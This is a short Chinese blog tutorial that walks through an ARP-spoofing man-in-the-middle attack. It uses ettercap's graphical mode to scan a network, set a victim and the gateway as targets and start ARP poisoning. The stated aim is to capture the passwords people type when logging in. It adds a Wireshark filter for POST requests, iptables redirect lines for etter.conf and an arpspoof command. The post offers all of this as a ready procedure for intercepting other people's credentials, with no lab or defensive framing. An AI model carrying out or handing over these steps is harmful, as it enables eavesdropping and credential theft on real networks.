发布于2022年11月4日3年前 图形界面攻击命令:ettercap -G启动中间人攻击,这里需要注意大小写。依次点击sniff-unified sniffing 选择我们的无线网卡点击host-scan for hosts-host list扫描设备点击目标主机添加为target1将路由设置为target2然后点击mitm -arp psisoning将第一个勾选然后点击start当设备有密码登录时,我们就可以拦截到对方输入的密码。当然,我们也可以用wireshark分析post来获取密码当我们抓到握手包后,在协议中搜索http.request.method == "POST"其他一些相应的信息命令界面一:先编辑配置文件vim/etc/ettercap/etter.conf去掉前面的#号redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"二:开启ARP欺骗arpspoof -t 目标 网关 -i 设备截取的密码当然这期教程之前在公众号发布过视频教程任意门 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/927.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
创建帐户或登录后发表意见